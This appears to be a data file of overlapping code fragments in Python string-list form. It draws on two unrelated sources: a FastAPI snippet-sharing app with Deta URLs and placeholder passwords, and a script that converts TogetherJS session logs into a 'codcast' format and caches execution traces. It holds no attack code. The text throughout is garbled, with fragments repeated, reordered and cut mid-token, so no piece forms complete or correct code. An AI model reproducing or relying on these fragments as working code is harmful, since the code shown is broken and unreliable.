fastapi import FastAPI, Response from fastapi.middleware.cors import", "# review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 #", "# main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast", "f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel): name: str code: str snip_id: str", "Read the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775", "str): snippet = get_snippet(snip_id) if not snippet: return False else: snippet = SnipInDB(**snippet)", "= [] password: str = \"<PASSWORD>\" class Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password:", "# README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app = App(fast) snippets = Database(\"snippets\") pwd_context", "str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return", "= gen_id() proposed_changes: dict = {} history: list = [] password: str =", "App, Database from fastapi.responses import HTMLResponse from deta.lib.responses import JSON from fastapi import", "{} history: list = [] password: str = \"<PASSWORD>\" class Password(BaseModel): password: str", "FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from passlib.context import CryptContext from pydantic import", "snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app =", "{\"error\": \"Invalid merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code", "str, password: str): snippet = get_snippet(snip_id) if not snippet: return False else: snippet", "dict = {} history: list = [] password: str = \"<PASSWORD>\" class Password(BaseModel):", "def merge_change(snippet_id: str, change_id: str, password: Password): if not authenticate_merge(snippet_id, password.password): return {\"error\":", "README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app = App(fast) snippets = Database(\"snippets\") pwd_context =", "password: Password): if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try: snippet" ]
[ "VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS, THEN", "editCode events since they often appear as # duplicates (or even more copies", "code in the editor contains those contents when they execute ''' from collections", "NB: one big challenge is that some types of events are duplicated (or", "script converts a codechella session log recorded by # ../../v3/opt_togetherjs/server.js # # and", "t = tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t']", "'#8d549f'}} # not sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally", "record only editCode events belonging # to the firstClientId user and discard all", "created: 2018-05-27 ''' NB: now that i think about it more, it's not", "it more, it's not entirely clear to me whether you can always tell", "same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if", "clientId for this event! # add these fields to match codcast format tjs['ts']", "firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t']", "typ == 'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if", "typ = tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read only the", "in the session). # the easiest way to manage it is to record", "sys import time from call_opt_backend import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES", "for e in raw_events: tjs = e['togetherjs'] # clean up and append to", "# to the firstClientId user and discard all other ones. if typ ==", "easiest way to manage it is to record only editCode events belonging #", "checking tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event! # add", "'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue # ...do the same with", "separately - app.editCode events are DEFINITELY duplicated - app.hashchange events might also be", ">> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] =", "clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d", "edits occurring at vastly different times which have the same 'd' all_code_edits_by_deltas =", "log recorded by # ../../v3/opt_togetherjs/server.js # # and turns it into the codcast", "to final events dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms =", "# if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue #", "converts a codechella session log recorded by # ../../v3/opt_togetherjs/server.js # # and turns", "if there are several *independent* # sets of edits occurring at vastly different", "necessary # TODO: we need to add frameNum field later on; or maybe", "oh wells, throw up our hands for nows. NB: one big challenge is", "# NB: this won't be fully accurate if there are several *independent* #", "be fully accurate if there are several *independent* # sets of edits occurring", "always tell who initiated an app.editCode event with any kind of certainty. oh", "tricky to log editCode events since they often appear as # duplicates (or", "there are several *independent* # sets of edits occurring at vastly different times", "is to record only editCode events belonging # to the firstClientId user and", "the firstClientId user and discard all other ones. if typ == 'app.editCode' and", "continue # ...do the same with hashchange: log them only for the firstClientId", "our hands for nows. NB: one big challenge is that some types of", "# TODO: maybe we don't need this since TogetherJS will take care of", "CACHE; IF THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!!", "( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll',", "# we get to it assert firstEditTimestamp <= t assert t - firstEditTimestamp", "that's who # initiated the session if not firstInitialAppState and typ == 'app.initialAppState':", "'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', )", "ORIGINAL PERSON was who # initiated this edit event, and log their clientId,", "take care of # mapping clientId's to usernames for us ... # #", "'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO:", "that the code in the editor contains those contents when they execute '''", "not sure if this is necessary # TODO: we need to add frameNum", "username (might change throughout the # session; keep the latest one) clientIdtoUsername =", "time from call_opt_backend import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = (", "which is readable by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output", "events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color':", "tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t']", "server to generate a real trace for the trace cache; we need to", "'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure", "we can use app.executeCode events as 'sync points' since we know that the", "here?!? events.append(tjs) # each element of myTraceCache is a pair of [appState, cached", "*independent* # sets of edits occurring at vastly different times which have the", "assume that's who # initiated the session if not firstInitialAppState and typ ==", "firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple()))", "event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True,", "OPT backends, depending on language TODOs: - not sure how much hashchange events", "multiple # identical sets of edits that take place at vastly # different", "edit event, and log their clientId, which may be # different than your", "Key: delta 'd' field, value: list of code edit events with that same", "continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] #", "FOR THE CACHE; IF THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM", "to make the proper calls to the various OPT backends, depending on language", "import json import os import sys import time from call_opt_backend import call_opt_backend #", "up who the ORIGINAL PERSON was who # initiated this edit event, and", "= tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp", "read only the FIRST initialAppState since we'll assume that's who # initiated the", "run the code on the actual server to generate a real trace for", "= [] for e in raw_events: tjs = e['togetherjs'] # clean up and", "list of code edit events with that same 'd' # # NB: this", "<= t assert t - firstEditTimestamp < 5000 # give it a 5-second", "# for app.codeEdit events, look up who the ORIGINAL PERSON was who #", "sets of edits occurring at vastly different times which have the same 'd'", "typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events since", "own clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert", "of [appState, cached trace from server] myTraceCache = [] for e in events:", "us ... # # Key: clientId, Value: current username (might change throughout the", "running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it", "events as 'sync points' since we know that the code in the editor", "'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR", "about it more, it's not entirely clear to me whether you can always", "Value: current username (might change throughout the # session; keep the latest one)", "value: list of code edit events with that same 'd' # # NB:", "typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky", "serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\",", "nows. NB: one big challenge is that some types of events are duplicated", "= defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs':", "if this is necessary # TODO: we need to add frameNum field later", "the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line)", "fully accurate if there are several *independent* # sets of edits occurring at", "N people in the session) since TogetherJS logs everyone's actions separately - app.editCode", "and discard all other ones. if typ == 'app.editCode' and firstClientId and tjs['clientId']", "tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity", "!= firstClientId: continue # ...do the same with hashchange: log them only for", "events dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) *", "buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change the clientId for this", "we need to add frameNum field later on; or maybe just add it", "= tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read only the FIRST", "some types of events are duplicated (or repeated N times if there are", "2018-05-27 ''' NB: now that i think about it more, it's not entirely", "more people in the session). # the easiest way to manage it is", "it's not entirely clear to me whether you can always tell who initiated", "= None firstClientId = None raw_events = [] # Key: delta 'd' field,", "# get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit", "# identical sets of edits that take place at vastly # different points", "CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES", "identical sets of edits that take place at vastly # different points in", "the firstClientId user if typ == 'hashchange' and firstClientId and tjs['clientId'] != firstClientId:", "it here?!? events.append(tjs) # each element of myTraceCache is a pair of [appState,", "be # different than your own clientId if tjs['type'] == 'app.editCode': d =", "myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState =", "may be # different than your own clientId if tjs['type'] == 'app.editCode': d", "it is to record only editCode events belonging # to the firstClientId user", "TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY", "the code in the editor contains those contents when they execute ''' from", "bridge when # we get to it assert firstEditTimestamp <= t assert t", "for sanity checking tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event!", "will fail if we have multiple # identical sets of edits that take", "contains those contents when they execute ''' from collections import defaultdict import dateutil.parser", "that this will fail if we have multiple # identical sets of edits", "that take place at vastly # different points in time, but let's cross", "this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object and", "out to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events, 'traceCache': myTraceCache}", "- maybe we can use app.executeCode events as 'sync points' since we know", "IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to", "who initiated an app.editCode event with any kind of certainty. oh wells, throw", "is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object and write", "cross that bridge when # we get to it assert firstEditTimestamp <= t", "if typ == 'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) #", "myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace'", "if there are N people in the session) since TogetherJS logs everyone's actions", "now that i think about it more, it's not entirely clear to me", "and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] # don't append", "!= firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >=", "firstClientId = None raw_events = [] # Key: delta 'd' field, value: list", "to me whether you can always tell who initiated an app.editCode event with", "sanity check: note that this will fail if we have multiple # identical", "to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer':", "for nows. NB: one big challenge is that some types of events are", "hashchange events matter - maybe we can use app.executeCode events as 'sync points'", "firstClientId user if typ == 'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue", "firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 #", "r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >>", "for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE", "depending on language TODOs: - not sure how much hashchange events matter -", "clientId's to usernames for us ... # # Key: clientId, Value: current username", "# # and turns it into the codcast format, which is readable by", "append to final events dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms", "challenge is that some types of events are duplicated (or repeated N times", "was who # initiated this edit event, and log their clientId, which may", "this is necessary # TODO: we need to add frameNum field later on;", "one) clientIdtoUsername = {} firstInitialAppState = None firstClientId = None raw_events = []", "TODO: maybe we don't need this since TogetherJS will take care of #", "firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if this is necessary", "../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to stdout # created: 2018-05-27", "continue tjs = rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES: continue", "# initiated the session if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState =", "get outta here! events = [] for e in raw_events: tjs = e['togetherjs']", "it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend", "myTraceCache = [] for e in events: if e['type'] == 'app.executeCode': myAppState =", "are more people in the session). # the easiest way to manage it", "- firstEditTimestamp < 5000 # give it a 5-second buffer for sanity checking", "to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events, 'traceCache': myTraceCache} print", "this edit event, and log their clientId, which may be # different than", "we'll assume that's who # initiated the session if not firstInitialAppState and typ", "change the clientId for this event! # add these fields to match codcast", "session if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId =", "or maybe just add it here?!? events.append(tjs) # each element of myTraceCache is", "firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special app.startRecordingDemo event", "more copies if there are more people in the session). # the easiest", "there are more people in the session). # the easiest way to manage", "is readable by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to", "look up who the ORIGINAL PERSON was who # initiated this edit event,", "only the FIRST initialAppState since we'll assume that's who # initiated the session", "TogetherJS logs everyone's actions separately - app.editCode events are DEFINITELY duplicated - app.hashchange", "for e in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r =", "code edit events with that same 'd' # # NB: this won't be", "../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput',", "== 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to", "a pair of [appState, cached trace from server] myTraceCache = [] for e", "# mapping clientId's to usernames for us ... # # Key: clientId, Value:", "firstInitialAppState = rec firstClientId = tjs['clientId'] # don't append any initialAppState events: if", "''' NB: now that i think about it more, it's not entirely clear", "{'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not", "{} firstInitialAppState = None firstClientId = None raw_events = [] # Key: delta", "if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId']", "# get outta here! events = [] for e in raw_events: tjs =", "TODOs: - not sure how much hashchange events matter - maybe we can", "# duplicates (or even more copies if there are more people in the", "rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ =", "session). # the easiest way to manage it is to record only editCode", "e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson =", "maybe we don't need this since TogetherJS will take care of # mapping", "# initiated this edit event, and log their clientId, which may be #", "events with that same 'd' # # NB: this won't be fully accurate", "'d' field, value: list of code edit events with that same 'd' #", "app.editCode events are DEFINITELY duplicated - app.hashchange events might also be duplicated -", "# each element of myTraceCache is a pair of [appState, cached trace from", "real trace for the trace cache; we need to essentially create a python-based", "app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl':", "not entirely clear to me whether you can always tell who initiated an", "# session; keep the latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId", "SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE", "since TogetherJS will take care of # mapping clientId's to usernames for us", "a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change the clientId", "any kind of certainty. oh wells, throw up our hands for nows. NB:", "d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0]", "sanity checking tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event! #", "initialAppState since we'll assume that's who # initiated the session if not firstInitialAppState", "events.append(tjs) # each element of myTraceCache is a pair of [appState, cached trace", "1000 # for app.codeEdit events, look up who the ORIGINAL PERSON was who", "ONLY take hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON", "by # ../../v3/opt_togetherjs/server.js # # and turns it into the codcast format, which", "if there are more people in the session). # the easiest way to", "manage it is to record only editCode events belonging # to the firstClientId", "don't need this since TogetherJS will take care of # mapping clientId's to", "'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange',", "tjs = e['togetherjs'] # clean up and append to final events dt =", "in the session) since TogetherJS logs everyone's actions separately - app.editCode events are", "place at vastly # different points in time, but let's cross that bridge", "(or repeated N times if there are N people in the session) since", "'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit =", "how much hashchange events matter - maybe we can use app.executeCode events as", "who # initiated this edit event, and log their clientId, which may be", "whether you can always tell who initiated an app.editCode event with any kind", "codechella session log recorded by # ../../v3/opt_togetherjs/server.js # # and turns it into", "duplicated - maybe ONLY take hashchange events for YOURSELF? HUGE WARNING: DO NOT", "call_opt_backend import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello',", "JSON output to stdout # created: 2018-05-27 ''' NB: now that i think", "= True tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary", "myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState", "different times which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in", "the easiest way to manage it is to record only editCode events belonging", "# prepend a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId':", "WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF", "is necessary # TODO: we need to add frameNum field later on; or", "firstClientId: continue # ...do the same with hashchange: log them only for the", "= ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection',", "it into the codcast format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts", "clientIdtoUsername = {} firstInitialAppState = None firstClientId = None raw_events = [] #", "= firstEdit['delta']['t'] # sanity check: note that this will fail if we have", "way to manage it is to record only editCode events belonging # to", "typ == 'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] # don't append any", "codcast format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts # # writes", "somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat',", "d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note", "sets of edits that take place at vastly # different points in time,", "'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't", "field later on; or maybe just add it here?!? events.append(tjs) # each element", "session log recorded by # ../../v3/opt_togetherjs/server.js # # and turns it into the", "edit events with that same 'd' # # NB: this won't be fully", "# created: 2018-05-27 ''' NB: now that i think about it more, it's", "# add these fields to match codcast format tjs['ts'] = ms tjs['sameUrl'] =", "check: note that this will fail if we have multiple # identical sets", "code on the actual server to generate a real trace for the trace", "as 'sync points' since we know that the code in the editor contains", "the code on the actual server to generate a real trace for the", "# Key: clientId, Value: current username (might change throughout the # session; keep", "duplicates (or even more copies if there are more people in the session).", "\"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] #", "actual server to generate a real trace for the trace cache; we need", "'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if", "app.hashchange events might also be duplicated - maybe ONLY take hashchange events for", "os import sys import time from call_opt_backend import call_opt_backend # somewhat modeled after", "to stdout # created: 2018-05-27 ''' NB: now that i think about it", "which may be # different than your own clientId if tjs['type'] == 'app.editCode':", "mapping clientId's to usernames for us ... # # Key: clientId, Value: current", "different points in time, but let's cross that bridge when # we get", "'d' # # NB: this won't be fully accurate if there are several", "them only for the firstClientId user if typ == 'hashchange' and firstClientId and", "it assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 # give", "assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check:", "even more copies if there are more people in the session). # the", "clear to me whether you can always tell who initiated an app.editCode event", "FIRST initialAppState since we'll assume that's who # initiated the session if not", "all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this", "= rec firstClientId = tjs['clientId'] # don't append any initialAppState events: if typ", "each element of myTraceCache is a pair of [appState, cached trace from server]", "trace for the trace cache; we need to essentially create a python-based driver", "initiated an app.editCode event with any kind of certainty. oh wells, throw up", "tjs['clientId'] != firstClientId: continue # ...do the same with hashchange: log them only", "for this event! # add these fields to match codcast format tjs['ts'] =", "'peer': {'color': '#8d549f'}} # not sure if this is necessary events.insert(0, startRecordingDemoEvent) #", "with that same 'd' # # NB: this won't be fully accurate if", "we need to essentially create a python-based driver (maybe using requests) to make", "this will fail if we have multiple # identical sets of edits that", "assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events = []", "have multiple # identical sets of edits that take place at vastly #", "serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson", "sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast", "of myTraceCache is a pair of [appState, cached trace from server] myTraceCache =", "milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo',", "vastly # different points in time, but let's cross that bridge when #", "e['togetherjs'] # clean up and append to final events dt = dateutil.parser.parse(e['date']) #", "to the various OPT backends, depending on language TODOs: - not sure how", "server] myTraceCache = [] for e in events: if e['type'] == 'app.executeCode': myAppState", "PERSON was who # initiated this edit event, and log their clientId, which", "up our hands for nows. NB: one big challenge is that some types", "# it's really tricky to log editCode events since they often appear as", "= [] # Key: delta 'd' field, value: list of code edit events", "firstClientId and tjs['clientId'] != firstClientId: continue # ...do the same with hashchange: log", "= dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special", "as # duplicates (or even more copies if there are more people in", "assert t - firstEditTimestamp < 5000 # give it a 5-second buffer for", "which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec", "= {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} #", "who the ORIGINAL PERSON was who # initiated this edit event, and log", "can always tell who initiated an app.editCode event with any kind of certainty.", "an app.editCode event with any kind of certainty. oh wells, throw up our", "special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs,", "the ORIGINAL PERSON was who # initiated this edit event, and log their", "the codcast format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts # #", "session; keep the latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId =", "= {} firstInitialAppState = None firstClientId = None raw_events = [] # Key:", "defaultdict import dateutil.parser import json import os import sys import time from call_opt_backend", "= firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000", "'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] ==", "this script converts a codechella session log recorded by # ../../v3/opt_togetherjs/server.js # #", "the various OPT backends, depending on language TODOs: - not sure how much", "- not sure how much hashchange events matter - maybe we can use", "at vastly # different points in time, but let's cross that bridge when", "../js/demovideo.ts # # writes JSON output to stdout # created: 2018-05-27 ''' NB:", "but let's cross that bridge when # we get to it assert firstEditTimestamp", "from server] myTraceCache = [] for e in events: if e['type'] == 'app.executeCode':", "are DEFINITELY duplicated - app.hashchange events might also be duplicated - maybe ONLY", "the same with hashchange: log them only for the firstClientId user if typ", "lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events = [] for e in", "# ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to stdout # created:", "duplicated (or repeated N times if there are N people in the session)", "continue # read only the FIRST initialAppState since we'll assume that's who #", "only editCode events belonging # to the firstClientId user and discard all other", "firstClientId user and discard all other ones. if typ == 'app.editCode' and firstClientId", "know that the code in the editor contains those contents when they execute", "# and turns it into the codcast format, which is readable by #", "= call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace =", "kind of certainty. oh wells, throw up our hands for nows. NB: one", "really tricky to log editCode events since they often appear as # duplicates", "events for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET,", "THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM", "NB: this won't be fully accurate if there are several *independent* # sets", "the codcast object and write it out to stdout as JSON codcastObj =", "all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] !=", "THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the", "= rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read", "firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if this", "if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events", "events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object and write it out", "user if typ == 